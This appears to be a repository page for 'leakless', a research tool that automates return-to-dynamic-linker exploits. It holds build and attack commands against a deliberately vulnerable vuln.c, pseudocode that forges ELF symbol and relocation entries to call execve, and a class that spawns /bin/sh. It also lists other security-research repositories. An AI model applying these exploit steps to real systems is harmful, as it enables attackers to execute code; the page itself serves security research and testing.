• Stars
    star
    156
  • Rank 239,589 (Top 5 %)
  • Language
    Python
  • Created over 9 years ago
  • Updated over 9 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Function redirection via ELF tricks.

How to test

  1. Build vuln.c

     gcc -fno-stack-protector vuln.c -o /tmp/vuln -m32 -O2
    
  2. Find the offset of the saved IP

     ruby19 "$METASPLOIT/tools/pattern_create.rb" 256 | /tmp/vuln
     dmesg | tail
     ruby19 "$METASPLOIT/tools/pattern_offset.rb" $SEGFAULT_IP
    
  3. Launch the attack with the desired parameter

     (python ./exploit.py /tmp/vuln --offset $OFFSET; echo ls) | /tmp/vuln
    

You can also just dump to a JSON file all the necessary information to perform the exploit:

python ./exploit.py /tmp/vuln --json

For debugging information, use the --debug parameter. For further information on the parameters use the --help parameter.

The CMake build system will compile vuln.c for x86 and x86-64 with different protections enabled. There's also a CTest testsuite which has been tested using the ld.gold linker and GCC 4.8.4. Different toolchains might require minor adjustments.

To launch it just run:

mkdir leakless-build
cd leakless-build
cmake ../leakless
make
make test

The build system has also the length, json and ropl targets which, respectively, produce the length of the generated exploit for each supported configuration and the JSON and ropl version of the exploit.

make length
make json
make ropl

Basic idea

char *buffer = .bss;
char *new_stack = buffer + 1024;
int *rubbish = new_stack + 4;

strcpy(buffer, "execve");
*((int *) buffer) = 'exec';
*(((int *) buffer) + 1) = 've\0\0';
char *name = buffer;
buffer += strlen(buffer) + 1;

Elf32_Sym *symbol = (Elf32_Sym *) buffer;
symbol->st_name = name - .dynstr;
symbol->st_value = 0;
symbol->st_info = 0;
symbol->st_other = 0;
symbol->st_shndx = 0;
buffer += sizeof(*symbol);

Elf32_Rel *reloc = (Elf32_Rel *) buffer;
reloc->r_offset = rubbish++;
reloc->r_info = (R_386_JUMP_SLOT | (symbol - .dynsym) / sizeof(symbol));
buffer += sizeof(reloc):

pre_plt((reloc - .rel.plt) / sizeof(Elf32_Rel));

Helper classes

  • MemoryArea: data structure representing a part of memory, with its start address, its size, a reference to what its relative to (e.g. the MemoryArea where we'll write the relocation structure will be relative to the .rela.dyn section). MemoryArea also takes care of computing the appropriate index (MemoryArea.index) relative to the specified part of memory.
  • Buffer: data structure holding information about a buffer where we want to write to things. Typically this will represent to .bss. Buffer also keeps track of what part of it has already been allocated (Buffer.current points to the next free location) and allows to allocate new MemoryAreas with the appropriate alignement.

Exploit-derived classes

  • Exploit: the base class, contains all the architecture- and platform-independent parts of the exploit. It keeps the list of the gadgets, it takes care of collecting all the interesting information about the program from the ELF file and abstracting some utility and memory-related functions (e.g. write_pointer and write_string) which rely on the abstract do_writemem function (which is platform- and program-dependent). Finally, in jump_to, contains the core logic for setting up the necessary data structures in the buffers.
  • CommonGadgetsExploit: inherits from Exploit and introduces architecture-dependent parts, in particular gadgets and function-invocation logic.
  • ExecveExploit: very simple class implementing the logic to launch an execve, so write a NULL pointer, a "/bin/sh\0" and explicitly look for execve. Finally invoke it.
  • RawDumperExploit: exploit useful to just collect the information necessary to perform the attack without actually generating the ROP chain. RawDumperExploit.jump_to will return as first result an array of tuples (address, what_to_write_there), which, for instance, are used to implement the --json parameter.

More Repositories

1

karonte

Karonte is a static analysis tool to detect multi-binary vulnerabilities in embedded firmware
Python
390
star
2

BootStomp

BootStomp: a bootloader vulnerability finder
Python
378
star
3

difuze

Fuzzer for Linux Kernel Drivers
C++
369
star
4

dr_checker

DR.CHECKER : A Soundy Vulnerability Detection Tool for Linux Kernel Drivers
C++
329
star
5

hal-fuzz

Source code of HAL-fuzz
137
star
6

baredroid

Python
90
star
7

packware

Effects of packers on machine-learning-based malware classifiers that use only static analysis
Python
83
star
8

pretender

Automatic modeling of hardware to enable the rehosting of embedded firmware
C
80
star
9

greed

A symbolic execution engine for EVM smart contract binaries.
Python
74
star
10

agrigento

Agrigento is a tool to identify privacy leaks in Android apps by performing black-box differential analysis on the network traffic.
Python
69
star
11

monolithic-firmware-collection

Repository for monolithic firmware blobs
Python
68
star
12

goldphish

Arbitrage bot for the Ethereum blockchain
Python
58
star
13

popkorn-artifact

Python
57
star
14

boomerang

Exploiting the Semantic Gap in Trusted Execution Environments
C
54
star
15

sailfish

Data and code for the IEEE S&P'22 paper SAILFISH: Vetting Smart Contract State-Inconsistency Bugs in Seconds
Python
50
star
16

heapster

Identify and test the security of dynamic memory allocators in monolithic firmware images
C
41
star
17

diane

DiAne is a smart fuzzer for IoT devices
Python
39
star
18

sasi

Signedness-Agnostic Strided-Interval
C++
34
star
19

actor

Source code for ACTOR, an action-guided kernel fuzzer (USENIX 2023 paper)
Go
27
star
20

android_ui_deception

Source code for our "What the App is That? Deception and Countermeasures in the Android User Interface" paper
Java
19
star
21

android_broken_fingers

Java
16
star
22

BullseyePoison

Bullseye Polytope Clean-Label Poisoning Attack
Python
14
star
23

autofacts

Towards Automatically Generating a Sound and Complete Dataset for Evaluating Static Analysis Tools
C++
14
star
24

symbexcel

Python
13
star
25

syml

Python
12
star
26

Neurlux

Code from the paper: Neurlux: Dynamic Malware Analysis Without Feature Engineering
Python
12
star
27

nft-security-study

Code and data of the CCS '22 paper titled "Understanding Security Issues in the NFT Ecosystem"
10
star
28

LoopMC

All code related to the LoopMC paper
Python
8
star
29

chainreactor

PDDL
8
star
30

ictf-service-samples

Sample services for the 2015 iCTF
Python
7
star
31

regulator-dynamic

C++
6
star
32

shimware

Python
6
star
33

turi

Python
5
star
34

DeepCASE-Dataset

5
star
35

bran

C
4
star
36

trust.io

A method for automatically protecting the physical interfaces on cyber-physical systems using TrustZone.
VHDL
4
star
37

hacrs

The human-assisted cyber reasoning system
JavaScript
4
star
38

jackal

Confusum Contractum: Confused Deputy Vulnerabilities in Ethereum Smart Contracts
Python
4
star
39

DeepCASE

Python
3
star
40

iCTF23

An educational CTF centered about the concept of AI and Cybersecurity
HTML
3
star
41

conware

Framework for automatically modeling hardware peripherals.
C
3
star
42

android_device_public

Java
3
star
43

columbus

Source code for Columbus (ICSE 2023 paper)
3
star
44

VenoMave

2
star
45

crush

Python
2
star
46

SECrow

Sources ad Guide for Secure Crowdsourced Location Tracking System paper.
Python
2
star
47

slither-sailfish

Modified Slither for Sailfish
Python
1
star
48

glitch_resistor

C++
1
star
49

cs177-ctfd-oracle-challenges

Plugin for CTFd to manage oracle challenges
Python
1
star
50

invisible-code

C
1
star
51

heapster-dataset-metadata

Collection of metadata for the firmware images used in Heapster
C
1
star
52

GUIDE-ENRICHER

Python
1
star